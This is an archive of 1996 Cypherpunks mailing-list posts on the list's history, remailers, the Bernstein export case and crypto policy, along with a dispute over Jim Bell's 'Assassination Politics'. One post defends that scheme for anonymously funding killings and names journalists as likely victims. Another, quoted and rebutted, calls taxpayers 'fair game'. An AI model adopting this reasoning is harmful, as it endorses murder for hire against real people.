(I was a vocal libertarian, part of the "techno-libertarian" vanguard. Eric was less closely associated with libertarianism, though his actions were certainly consistent with this outlook. John Gilmore was, well, John. Active in forming the EFF and in fighting for various causes. Hugh Daniel, another early founder, was also a long-term activist in hypertext, networking, and libertarian issues. So, the several of us were much interested in deploying cryptographic protocols to implement interesting new social and political possibilities...at the very first meeting there were exciting discussions about new banking systems, an Italian scheme where the survivor of an N-person group gets a payoff (and we discussed how this could be implemented with Chaumian digicash), remailers (we tested models for remailers, and the Hughes/Finney remailer appeared within a month or two), and so on.)

(Having attended the Crypto conference (in 1988), and having read "The Journal of Cryptology," the Eurocrypt, Asiacrypt, and Crypto Proceedings, I can tell you that the first Cypherpunks meeting (not named by Jude Milhon for another month or two) had a dramatically different "feel" to it. It was _not_ just another forum for releasing research results, or for discussing Unix hacks.)

"YOU GUYS ARE JUST A BUNCH OF CYPHERPUNKS"

As we talked about what we were doing, and who we were, various names popped up. "The Crypto Freedom League." "Privacy Hackers." "The Crypto Cabal." And so on. Jude Milhon's "You guys are just a bunch of cypherpunks," a wonderful pun on "cyberpunk" and the British spelling of "cipher," was accepted by acclamation. Though "punk" has some negative connotations, so do nice, staid names like "The Foundation for Unrestricted Cryptography," or "The Crypto Programmer's League."

(We've had debates on the suitability of the name at least half a dozen times over the years. It ain't gonna change. The most that could happen is that some faction would claim to be the One True Faction and would call themselves by something more respectable (or less respectable, I guess). But the rest of us would still be Cypherpunks. Get used to it. Too late to change now.)

THE INEVITABLE DECLINE IN FRESHNESS OF TOPICS

Over the years, as remailers got deployed, as PGP spread, as "crypto" appeared more and more often in the popular press, the topics which were once so new and fresh inevitably had been through many, many cycles of discussion. We had 10 rounds of discussion of DC-Nets, 7 rounds of discussion of random number generators, 11 rounds of discussions of whether the NSA reads all mail, and so on.

Not much can be done about this...new people join the list and ask questions, old-timers jump in with speculations, and sometimes news events trigger a debate.

How else could it be? A moderated list with only announcements of new results? (This would likely generate about two messages per week, tops, and such a list would have few subscribers, and no interesting debate. Also, plenty of other fora exist for this, including the Usenet itself, e.g., sci.crypt.research.)

WHAT IT IS

No, for all its noise and faults, the list is what it is. Not perfect, but, then, few things are. And about as good as I've seen.
(I've been on several other mailing lists, and the usual death of lists comes from disinterest and boredom, not from overuse. Filters are able to remove noise, but filters can't add signal.)

That's all I have to say for now. By all means, try to contribute signal. But don't carp about how low the S/N ratio is, and don't carp about worthless messages. And don't chime in with unneeded "defenses" of me or anyone else attacked by kooks and nebbishes.

--Tim May, whose reputation is, like the list, whatever it is, for whatever reasons, and who thus needs no defenders

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA   | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From stewarts at ix.netcom.com Tue Sep 24 15:58:03 1996
From: stewarts at ix.netcom.com (stewarts at ix.netcom.com)
Date: Wed, 25 Sep 1996 06:58:03 +0800
Subject: AP Protocol Failures [NOISE]
Message-ID: <199609241701.NAA16848@attrh1.attrh.att.com>

>> Troops are in Northern Ireland for a very simple and depressing
>> reason. People like Jim want to impose their will on others by force.

People have been imposing their will on others in Ireland for 800 years, and killing off the more prominent members of the opposition has been a long-term policy of the thugs who've been doing it. Today there are at least three competing gangs of thugs trying to impose their will on others by force.
The Protestants are afraid that the Catholic majority on the island will enforce their rule on them, and the Catholics in the north are afraid that the Protestants will enforce their rule on them, both with good reason as near as I can tell. At least a few years ago, the IRA were spouting Marxist rhetoric and wanted to impose their Marxist thuggery on the whole island.

The Queen's Empire's army understands AP better than the IRA does - they know the IRA's happy to kill Imperial soldiers who wander around unprotected. On the other hand, the IRA are a bunch of murdering thugs who blow up pubs and non-combatants as well as targeting soldiers. Some of the pro-Saxon Orangeheads do the same, of course, though most of them mainly like to have parades in Catholic neighborhoods to say "Nyahh, nyahh, we still rule you peons." The atrocities that the IRA and Brits commit against each other are both unsupportable, and lead to more conflict rather than peace, but neither side has the high moral ground to complain about it.

But AP is great - adding more violence to Ireland is just the thing they need........

One of the strong negatives of AP is that it leads to reverse AP - if you don't know _which_ Hatfield killed the latest McCoy, you might as well just shoot one or two Hatfield Boys at random. If you kill off GrandDaddy Hatfield, there's nobody to say "OK, let's stop shooting each other"; instead there's a bunch of angry grandkids, and uncles, _all_ of whom have the authority to say "Let's go kill the McCoy bastards who did this!" The protocols may work when there's one hierarchical target - they don't work with two.

Hammurabi's law about "An eye for an eye and a tooth for a tooth" was a _limitation_ on the amount of vengeance you were allowed to take, not a minimum required vengeance.

jonathon wrote:
> Do that op-ed piece --- but remember that AP is not a libertarian
> position. Libertarians think that government is a good thing.
> AP thinks that government is a bad thing, and their philosophical
> differences get wider, from there.

Libertarians have varying opinions about government; some of us are anarchists, while some are minarchists. Most of us figure that once we've gotten rid of the first 90% of government, we can haggle about the rest of it then, in a much freer society, where people will have different perspectives on what stupid and obnoxious things they want the government to stop doing next. And if the well-intentioned-but-misguided minarchists prevail, it'll still be far better than today :-)

Assassins, on the other hand, are generally on power trips - I don't see that replacing power-tripping wholesale murderers with lots of power-tripping retail murderers is really a good thing.

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From s1113645 at tesla.cc.uottawa.ca Tue Sep 24 16:02:22 1996
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Wed, 25 Sep 1996 07:02:22 +0800
Subject: Bernstein hearing: The Press Release
In-Reply-To:
Message-ID:

On Sun, 22 Sep 1996, Jim McCoy wrote:

> Brian Davis
> [...]
> >Constitutional literalists take note: the First Amendment says nothing
> >about what the executive branch or the states can do ....

Doesn't the doctrine of limited powers mean that they cannot do what is not specified? (If I'm not mistaken, IANAL, etc...)

> The states are prohibited through the 14th Amendment via the
> Slaughterhouse cases, the ability of the executive branch to
> violate due process is questionable (from a legal viewpoint, not
> a practical one...the President cannot order you placed in jail
> unless you have broken a law which requires congress to have
> made the law in the first place...)

And the ITARs are only executive orders, no? Not laws, right? I'm curious as to why they're considered valid. Anyone know?
From hfinney at shell.portal.com Tue Sep 24 16:04:05 1996
From: hfinney at shell.portal.com (Hal)
Date: Wed, 25 Sep 1996 07:04:05 +0800
Subject: Portal remailer shutting down
Message-ID: <199609241903.MAA20095@jobe.shell.portal.com>

The ISP which I have used for over five years, portal.com, is going out of business at the end of this month (September, 1996). This means that my remailer at hfinney at shell.portal.com will cease operations. I had asked that it be removed from the remailer lists a few weeks ago due to some problems, so hopefully not many people have been using it lately. But now it will go away for good.

This remailer has been in operation since the fall of 1991. I believe it has been the longest continually running remailer on the net. It was one of the first "cypherpunk" remailers, based on Eric Hughes' code, to which I added support for PGP messages. (Actually there was a remailer running out of Australia for a short time earlier in 1991 which was the first to use PGP. It was a very nice system but got shut down supposedly due to traffic concerns, although there seemed to be some politics involved as well.)

I have also been running a remailer from my account at hal at alumni.caltech.edu. However that one cannot tolerate abuse complaints, hence I have been forwarding all mail out of that remailer through the portal one, for a number of years. Now that Portal is gone, this will be a problem. I plan to restrict the alumni remailer to only send mail to other addresses on a fixed list, which will initially be just the other remailers. That way the remailer can be used to form chains, but not to send to end users. This limited functionality should still be useful.

It may be possible to create a web page where people can sign up to say they would not object to receiving anonymous mail. Most people are open minded and curious enough that they wouldn't mind signing such a list. Make it easy enough and you will collect thousands of names.
Now people who want to create nyms using remailer chains for return addresses can add their names to the list without feeling that they are compromising their identity. They can use a remailer which only sends to people on the list as the last remailer in their chain, with some confidence that the remailer is unlikely to be shut down due to abuse complaints.

Hal

From cbarnett at eciad.bc.ca Tue Sep 24 16:19:51 1996
From: cbarnett at eciad.bc.ca (Clint Barnett)
Date: Wed, 25 Sep 1996 07:19:51 +0800
Subject: crypto anarchy vs AP
In-Reply-To: <199609240700.AAA16178@mail.pacifier.com>
Message-ID:

if I'm not mistaken, large companies are able to purchase (in a way) government support. Special interest groups and large lobbying groups are also able to sway the government with either money, votes or things more insidious. You are absolutely right, big companies do get bigger because of (partly) government support of some form, but that's because they can afford to pay for it.

clint barnett
lord of the cosmos
emily carr institute

On Tue, 24 Sep 1996, jim bell wrote:

> At 11:26 AM 9/23/96 -0700, Clint Barnett wrote:
>
> >>to create the appearance of as free a life style as they can for
> >>individuals
> >
> >ever read "1984"? the appearance of a free lifestyle is most definitely
> >not a free lifestyle. I am hardly a friend of the state, and far from
> >being an advocate of the church, but multinational corporations running
> >the world for their own fun and profit makes my sphincter clench.
>
> I think you're under a mis-impression here. At least in the libertarian
> circles where I do most of my political discussion, it is generally
> suspected that corporations grow large and powerful primarily BECAUSE OF
> assistance by and due to the policies of government.
> (heavy regulation
> favors large companies by keeping down small competitors, etc) Of course,
> that cause/effect relationship is intentionally hidden, and most of the
> public sees the show put on which appears to have the opposite effect:
> Anti-trust lawsuits, etc.
>
> Over time, the public is gulled into the false belief that if you get rid of
> the government, you get rid of the "only thing that stands between us and
> the multi-national corporations." They believe this because the only
> government actions they see and recognize are anti-corporation. If they
> were aware of the truth, they'd realize that these large corporations are
> actually afraid of a free market, and that the companies consider big
> government to be their friends.
>
> Just look at an excellent example: Intel versus IBM. Intel used to be this
> tiny upstart chip company from the Bay area and IBM was smokestack America.
> Now, Intel is the biggest (by dollar volume, anyway) chip company in the
> world and IBM is, well, considerably cut back from its heyday. At least in
> hindsight, IBM would have been "smart" to squash Intel, or buy it up, or
> have the government over-regulate it.
>
>
> Jim Bell
> jimbell at pacifier.com
>

From ses at tipper.oit.unc.edu Tue Sep 24 16:21:36 1996
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Wed, 25 Sep 1996 07:21:36 +0800
Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!]
In-Reply-To: <199609241518.JAA08759@InfoWest.COM>
Message-ID:

On Tue, 24 Sep 1996, attila wrote:

>
> go back to your beloved England and your labour unions
your roots are showing :-)                 ----^
> NO, I will not outright reject Jim Bell's "Assassination
> Politics."

Assassination politics is impossible to defend from a classical Liberal/Libertarian position. Bell advocates arbitrary applications of violence and coercion without restriction.
There is no way to justify the initiation of force without abandoning any pretence of being a Libertarian (which, to be fair, Bell doesn't claim to be).

From perry at piermont.com Tue Sep 24 16:22:15 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 25 Sep 1996 07:22:15 +0800
Subject: The Nature of the Cypherpunks List
In-Reply-To:
Message-ID: <199609241913.PAA19989@jekyll.piermont.com>

Timothy C. May writes:
> While some folks would rather we talked only about "crypto," just how many
> times can basic questions about Diffie-Hellman, or RSA, or elliptic curves
> be discussed?

I think a better question is "do we need to have to make sure people are posting for the sake of posting? Why must we have a charter broad enough to generate too much volume to allow conversation?"

Sure, there is a limit to what can be said about cryptography and the direct politics of cryptography. *THAT IS THE POINT*. That is why I'm starting a new list -- so that I can abandon this waste heap to those that like frolicking in the mire.

> And as I was there at the initial planning meeting in July of '92, and then
> at the first physical meeting, I can assure you that what soon became
> "Cypherpunks" was never intended to be an announcement list for research
> discoveries in mathematical cryptography!

No. It was intended for discussion of cryptography *and* the politics of cryptography. Not theories about some airliner was shot down by aliens, not random musings on "assassination politics". The idea was never to be restricted just to the technical aspects of cryptography, but the notion was to have a place where the non-technical discussion also was on *cryptography*.

This list no longer has *any* charter. A posting on sexual practices in Botswana is probably as "on topic" as anything else these days. The new list, however, will have a charter, and it *will* be enforced.

> Much as some have been shrilly claiming "This list is for crypto and
> programming discussions only," this was *never* the intent.

Tim, I hate to say this, but cypherpunks is a sewer which has driven off anyone seriously interested in the area, and you are part of the reason.

> The serious crypto researchers, e.g., the Matt Blazes, the Whit Diffies,
> and the Carl Ellisons of the world, have various channels they use to
> communicate in.

For those who can think back a few years, this *used* to be one of those fora. No longer, of course. This is not for people serious about anything. I no longer read 99% of what is posted here -- it's drek.

I do not believe it would be good, however, for the list to be shut down, because there have to be sewers to carry the world's intellectual waste products, and if this list did not exist the likes of Jim Bell and the others would be out causing harm on other mailing lists.

Perry

PS Still looking for a solid site that can host a 1500 member significant volume mailing list without choking.

From jf_avon at citenet.net Tue Sep 24 16:25:28 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Wed, 25 Sep 1996 07:25:28 +0800
Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE]
Message-ID: <9609241724.AB00771@cti02.citenet.net>

On 23 Sep 96 at 22:10, hallam at vesuvius.ai.mit.edu wrote:

> People like Jim want to impose their will on others by
> force.

Mr. Bell pushing the AP scheme does not mean that he wants to impose his ideas by force since he will have *no* means of controlling what ideas will be favored. It is strictly market forces that will dictate what will happen. As many, including Mr. Bell have pointed out, he might very well be one of the first victims of the AP system.

Mr Bell is pushing AP because he believes that the bulk of human race wants to live peacefully and he therefore concludes that AP, being led by the demand of ordinary people, will lead to a more peaceful world.
When you'll get to learn how AP operates, your conclusions of an AP regulated world will, IMO, be dependent on the specifics of your definition of human race.

> Despite prolonged attempts by each faction to assassinate the
> leaders of the other they have been unsuccessful.

As I mentioned in my other post to you, this is not a reference since the operating mode of AP is entirely different.

> If terrorists trained by Libya and Syria are unable to assassinate
> at will then we can be sure that Jim's band of kooks is not going
> to get any further.

Again, absolutely irrelevant to AP. Go read the book again.

> It is surprising that someone from the press has not seized upon
> Jim's ideas as cause for another cyber-scare. I suspect this is
> because people like Markof are somewhat more responsible.

No, it is not surprising at all, but you did not seem to have understood why:

1) The dissatisfaction of the population is such that many would actively seek where to send their buck to have somebody offed.
2) The way AP works, journalists would be privileged victims, paid for by the same disgruntled population
3) More than everything else, they (the journalists) probably understood *exactly* how AP works and thus fully realised point 2)

> This is not going to stop me from producing an op-ed piece linking
> the net libertarians to assassination politics unless I hear a few
> more repudiations of Bell's ideas.

That would be the best way of promoting AP. Everyone who favors it would say: "Go ahead, it'll be our pleasure!"

AP will not die for several reasons. The first one is that it only requires knowledge and a little coding. The second is that there is a demand. Prostitution could never be eliminated. Yet, it does not menace the system itself. AP will be tougher than prostitution and it will probably actively seek the system's destruction (as we know it).

I suggest you try to understand the mechanics of AP.
jfa
Jean-Francois Avon, Montreal QC Canada
DePompadour, Societe d'Importation Ltee
Finest Limoges porcelain and crystal
JFA Technologies, R&D consultant
physicists and engineers, LabView programming
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891

From jya at pipeline.com Tue Sep 24 16:27:45 1996
From: jya at pipeline.com (John Young)
Date: Wed, 25 Sep 1996 07:27:45 +0800
Subject: ICI_96x
Message-ID: <199609241940.TAA09129@pipe1.ny1.usa.pipeline.com>

A fax appeared of the International Cryptography Institute, 1996, October 25-26, in DC. Here are excerpts:
_________________________________________________________

What are the different national policies and regulations governing cryptography and how might these evolve?

What cryptography technologies are on the market in different countries, what is being used, and for what purpose?

What problems is cryptography causing law enforcement?

What are the requirements of business and other organizations?

What are the new trends in cryptography and what will be their impact on society?

What efforts are leading toward an international cryptography framework?
_________________________________________________________

Sample sessions:

The International Cryptography Experiment
Export controls on Encryption Software
Cryptography: Recent Developments in the EU
Towards an Australian Policy on Encryption
New Russian Encryption Policies and Regulations
International Regulation of Cryptography: Update
U.S. Government Cryptography Policy
Law Enforcement Requirements for Encryption
Transnational Key Escrow
Commercial and International Key Escrow
Digital Cash
_________________________________________________________

Some of 38 "Invited Faculty"

Dr. Dorothy Denning, Georgetown University
Mr. John Droge, Mykotronix
Mr. Louis J. Freeh, Director, FBI
Mr. Michael Gilmore, FBI
Mr. David Kahn, Author, NSA
Dr. Kwok-Yeo Lam, National University of Singapore
Dr. Anatoly N. Lebedev, LAN Crypto, Ltd.
Mr. Ronald Lee, General Counsel, NSA
Mr. Yves LeRoux, Digital Equipment
Mr. Nick Mansfield, Shell International Petroleum
Mr. Michael Nelson, White House Office STP
Dr. Jean-Jacques Quisquatier, University of Louvain
Mr. John Young, National Computer Board [Nope]

-----

http://jya.com/ici96x.txt

ICI_96x

From aba at dcs.ex.ac.uk Tue Sep 24 16:35:00 1996
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Wed, 25 Sep 1996 07:35:00 +0800
Subject: Transforming variable-length to fixed keys
In-Reply-To: <84345225525232@cs26.cs.auckland.ac.nz>
Message-ID: <199609241547.QAA00089@server.test.net>

Peter Guttmann writes on cpunks:
> I posted this to sci.crypt recently but the response to it was rather
> underwhelming, so I thought I'd repost it here to see if anyone has any
> comments on it. What it is is a scheme for transforming arbitrary user keys
> (typically a long passphrase) into a fixed-length key for a particular
> algorithm. This has the following properties:

> 1. The user key 'userKey' is transformed into an algorithm-specific key 'key'
> using a number of 'iterations' of a hash algorithm 'hash()'.
>
> 2. The transformation is strongly serialized so that any form of attack
> involving parallelization or precomputation isn't possible.

If the speed of your key generation is an issue, you could do something like:

    key[] = { 0 };
    const int nhashes = 4;
    typedef void (*hashfnptr)(byte*, byte*, int);

    /* array of hash functions */
    hashfnptr hash[ nhashes ] = { md5, sha1, haval, ... };

    state = hash[ 0 ]( algorithm, mode, parameters, userKey );

    for count = 1 to iterations
        for length = 1 to keyLength (in hash_output_size blocks)
            /* selecting a hash function based on the state */
            state = hash[ state % nhashes ]( state );
            key[ length ] = hash[ state % nhashes]( state, userKey );

This provides more expense in hardware for the same expense in software, so for the same CPU time you get more hardware expense, and could reduce the iterations for the same security.
`nhashes' determined by the number of digest algorithms you consider trustworthy. (They need hardware for `nhashes' different digest algorithms).

You need to do something about resolving the differing output and state sizes.

Probably speed isn't an issue though.

Adam

From haystack at cow.net Tue Sep 24 16:37:36 1996
From: haystack at cow.net (Bovine Remailer)
Date: Wed, 25 Sep 1996 07:37:36 +0800
Subject: Universal Avatar spec
Message-ID: <9609241955.AA21939@cow.net>

IBM, Velocity, and Chaco team up for identity on the net:

http://www.chaco.com/avatar/avatar.html

> The real power of Universal Avatars comes from the inclusion of
> other capabilities into the system. First, consider the implications
> of embedding a public key, or Netscape certificate, into the
> Universal Avatar file. By introducing secure communications, the
> avatar can effect instantaneous financial micro-transactions
> seamlessly in a virtual world. For example, an avatar could walk
> through a virtual mall and transparently purchase items. Since his/her
> profile is under the strict control of the user, s/he could declare
> an interest in modems. Virtual stores could then automate the process
> of discovering where the potential customer's interests lie, while
> keeping the customer's personal information strictly confidential and
> email address safe from spamming.

From haystack at cow.net Tue Sep 24 16:43:41 1996
From: haystack at cow.net (Bovine Remailer)
Date: Wed, 25 Sep 1996 07:43:41 +0800
Subject: Bernstein hrg in the news
Message-ID: <9609241946.AA21891@cow.net>

Feds on the Ropes In Suit Challenging Arms Export Law
(Dan Goodin, The Recorder (SF), 9/23/96, p.1)

A professor who says federal restrictions on the export of encryption software violate his right to free speech seemed to get a sympathetic hearing from a federal judge on Friday.

In a closely watched case challenging export restrictions on encryption software, U.S.
District Judge Marilyn Hall Patel did not rule on summary judgment motions. But she appeared impatient when a U.S. Department of Justice attorney attempted to revive an issue settled months ago in that case.

Patel handed plaintiff Daniel Bernstein a big victory in April, ruling that software is protected speech under the First Amendment. But the ruling in _Bernstein v. U.S. Department of State_, 95-0582, didn't deter government attorneys Friday from trying to reargue the point.

Justice Department trial attorney Anthony Coppolino argued that the government controls on the export of software are not based on the content of the computer code but rather on its functionality. Therefore, he argued, the restrictions are not a prior restraint of speech protected under the Constitution.

Patel replied: "You'll get a chance to argue that in another courtroom."

Cindy Cohn, an associate with San Mateo's McGlashan & Sarrail representing Bernstein, said she was pleased with the way the hearing appeared to go. "My impression is the fact that [Patel] was asking more questions of [Coppolino] than me meant that he was the one who needed to convince her," Cohn said.

Coppolino declined to comment.

LICENSE TO 'SNUFFLE'

Filed in February 1995, the suit challenges provisions of the International Traffic in Arms Regulation Act, which classifies encryption programs as "munitions" and subjects them to strict export controls.

In October 1993, the U.S. State Department told Bernstein he would need an arms export license to post his "Snuffle" encryption program and accompanying documentation to an Internet discussion group. He subsequently filed suit seeking to have the requirement declared unconstitutional.

After Patel's April ruling, the case now turns on whether restrictions on the export of such software and accompanying "technical data" amount to prior restraint, which can only be exercised extremely narrowly.
High-tech companies are closely watching the case, having complained bitterly for years that the law has crippled their ability to compete in the global software market. Particularly in the burgeoning arena of Internet and network-related software products, encryption features are considered essential to protect sensitive data transmissions from unauthorized access.

Legislative attempts at relaxing export laws so far have been unsuccessful. A bill now before the Senate Commerce Committee has received stiff opposition from the Clinton administration, and even its supporters say it is unlikely the bill will pass this term.

But Stanton McCandlish, a spokesman for the Electronic Frontier Foundation - a group that advocates extending civil liberties into digital media such as the Internet - said the so-called Pro-CODE bill sponsored by Sen. Conrad Burns, R-Mont, could be made moot by Bernstein's case.

"If we get the ruling we're looking for," he said, "and it's affirmed at the Supreme Court level, which is pretty likely, the Pro-CODE bill is probably not needed at all."

(retyping by NLA, newspaper liberation army.)

From azur at netcom.com Tue Sep 24 16:57:00 1996
From: azur at netcom.com (Steve Schear)
Date: Wed, 25 Sep 1996 07:57:00 +0800
Subject: Where to write crypto?
Message-ID:

I believe Taiwan might be an excellent location to have 'clear room' crypto work done. Taiwan has a very large skilled software labor pool and isn't a member of COCOM.

PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur at netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for the good of its victims may be the most oppressive." -- C.S.
Lewis "Surveillance is ultimately just another form of media, and thus, potential entertainment." -- G. Beato From harmon at tenet.edu Tue Sep 24 17:05:04 1996 From: harmon at tenet.edu (Dan Harmon) Date: Wed, 25 Sep 1996 08:05:04 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: Message-ID: HERE, HERE! On Mon, 23 Sep 1996, Sandy Sandfort wrote: > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > SANDY SANDFORT > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > > C'punks, > > On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > > There is no such thing as an "ordinary citizen". When the U.S. commits > > war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere, > > every American taxpayer is an accomplice and a fair game. > > Illogical collectivist claptrap. When a taxpayer is targeted by > terrorists, he has been victimized twice--first by the government > that stole his money, second by the terrorist that punished him > for the (alleged) acts others committed with that money. If a > mugger buys a gun with the money he took from me, am I then > responsible for the murder he commits with it? Clearly not. > This line of "reasoning" is nothing more than a sad variant of > the old, "blame the victim" game. For shame. > > Let's bring this back to crypto for a moment. Dimitri's "logic" > must necessarily lead one to the conclusion that Cypherpunks (at > least those in the US) are responsible for whatever draconian > restrictions "our" government puts on free speech, crypto or > whatever. John Gilmore, Philip Zimmermann, Whit Diffie and > others will be chagrined to learn this, I'm sure. > > Dimitri needs to learn what it means to be an adult. Everyone is > totally responsible for what they do, but ONLY for what THEY do. > No one is responsible for the unassisted, willful acts of others. 
>
>
> S a n d y
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>
>

From whgiii at amaranth.com Tue Sep 24 17:09:19 1996
From: whgiii at amaranth.com (William H. Geiger III)
Date: Wed, 25 Sep 1996 08:09:19 +0800
Subject: WARNING: This Message Actually Contains a Question Reguarding Crypto!
Message-ID: <199609241649.LAA22238@mailhub.amaranth.com>

Hi,

I just recently downloaded copies of Blowfish & Ghost. Does anyone have any experience with these two algorithms? How do they compare to RSA, DES, 3DES, IDEA?

I came across a post awhile back that mentioned that they were using Blowfish in PGPPhone. Can anyone confirm this? Does anyone know how they are using Blowfish and why?

Thanks,

--
-----------------------------------------------------------
William H. Geiger III http://www.amaranth.com/~whgiii
Geiger Consulting WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site
Author of PGPMR2 - PGP Front End for MR/2 Ice
Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
Finger whgiii at amaranth.com for PGP Key and other info
-----------------------------------------------------------

From andrew_loewenstern at il.us.swissbank.com Tue Sep 24 17:36:08 1996
From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern)
Date: Wed, 25 Sep 1996 08:36:08 +0800
Subject: Eudora 3 EMS API stuff
In-Reply-To:
Message-ID: <9609241818.AA00638@ch1d157nwk>

Someone at qualcomm writes (forwarded by ddt at lsd.com):
> Abstractly speaking, the EMS API is most suited for performing
> transformations, conversions and some other forms of processing
> on email messages as they are sent and received by Eudora.
>
> In practice it is very useful for encryption, digital signatures,
> and compression.

ahh, a classic instance of "crypto with a hole" ...
andrew From pgf at acadian.net Tue Sep 24 17:40:24 1996 From: pgf at acadian.net (Phil Fraering) Date: Wed, 25 Sep 1996 08:40:24 +0800 Subject: provably hard PK cryptosystems In-Reply-To: <3247E194.3F54BC7E@systemics.com> Message-ID: On Tue, 24 Sep 1996, Gary Howland wrote: > I fail to see *any* (non educational) use for these DNA "computers", let > alone a cryptographic use - sure, they may be massively parallel, but > what's the big deal? I can now perform a calculation a million times > faster than I could yesterday? (something I personally doubt, but will > agree to for sake of the argument). I could get the same results > writing a cycle stealing Internet java app, so what's all the fuss > about? It sounds to me like your argument abstracts thusly: "Personally, I fail to see the point to the development of more powerful computers, since I can always steal time from other people's current technology computers." One could make this statement about _all_ advances in processor technology. And it boils down to this: you're not paying for it, so you don't see the point in getting more bang for the buck. People who are paying for it, and have neither the inclination nor the ability to steal, do see the point of getting more bang for the buck. And eventually even you'll benefit, when you find yourself writing a java applet to freeload processor time on someone else's DNA computer. Meanwhile, processor technology will have advanced because many people went out and paid for faster (Intel/PowerPC/PowerDNA/Whatever) CPU's. Not because you freeloaded off of someone else. > -- > pub 1024/C001D00D 1996/01/22 Gary Howland > Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 > Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 "Pinky, your brain waves are giving The Amazing Kreskin a pounding headache." 
From hua at chromatic.com Tue Sep 24 17:45:15 1996 From: hua at chromatic.com (Ernest Hua) Date: Wed, 25 Sep 1996 08:45:15 +0800 Subject: Good article on inevitability of unregulated crypto ... Message-ID: <199609242141.OAA05593@ohio.chromatic.com> http://www.zdnet.com/intweek/print/960624/cover/doc1.html This, of course, is not any indication that we should not stay vigilant. As is clear from every public statement by the past and present administrations, they have an agenda to protect their monopoly on intelligence gathering. They clearly have a strong interest in hamstringing every single challenge to the current regulations. If ITAR is torn down, then they will use the OECD and other international organizations to stop the flow of encryption. It is NOT useful to reason with them. It takes direct confrontation using legislation and court case battles to fix this problem. Ern From rah at shipwright.com Tue Sep 24 18:17:02 1996 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 25 Sep 1996 09:17:02 +0800 Subject: Barlow/Taylor censorship debate In-Reply-To: Message-ID: At 4:23 pm -0400 9/23/96, Roderick Simpson wrote: > Bruce Taylor, over I *really* wish people would use his *whole* name, so we don't confuse him with the other Bruce Taylors on the net. His whole name is: Bruce "Penis With a Blister On It" Taylor. Since that's the phrase he kept repeating over and over at CFP96, it *must* be his middle name... I'll save the joke about lawyers and neckties for another occasion. ;-). Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." 
-- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From rah at shipwright.com Tue Sep 24 18:43:11 1996 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 25 Sep 1996 09:43:11 +0800 Subject: ISPs' information on users Message-ID: --- begin forwarded text X-Sender: rodney at pop3.pn.com Mime-Version: 1.0 Date: Tue, 24 Sep 1996 08:57:01 -0400 To: dcsb at ai.mit.edu From: Rodney Thayer Subject: ISPs' information on users Sender: bounce-dcsb at ai.mit.edu Precedence: bulk Reply-To: Rodney Thayer Something to think about before any of us start selling Ketchup on-line via E-cash... >Date: Sun, 22 Sep 1996 23:53:02 -0400 >From: darius at world.std.com (Darius Thabit) >Subject: ISPs' information on users >Date: Sun, 22 Sep 1996 01:18:59 -0700 (PDT) >From: Phil Agre > >=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >This message was forwarded through the Red Rock Eater News Service (RRE). >Send any replies to the original author, listed in the From: field below. >You are welcome to send the message along to others but please do not use >the "redirect" command. For information on RRE, including instructions >for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu >=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > >Date: Fri, 20 Sep 1996 19:16:19 +0200 >From: steve at isys.hu (Steven Carlson) >To: hungary-online-announce at hungary.yak.net >Subject: (HOL-A) It's a Brave Old World > > ------------------------------ > Brave Old World: > Reflections on Europe in the Digital Age > by Steven Carlson; 20 Sep 1996 > ------------------------------ > > ** So Much Fuss About A Bottle Of Ketchup > > Hungarian police recently sent a fax around to the local Internet > service providers (ISPs) asking them to provide lists of their users > in Esztergom, a small town outside of Budapest. It seems somebody > had planted a bomb in a bottle of ketchup. 
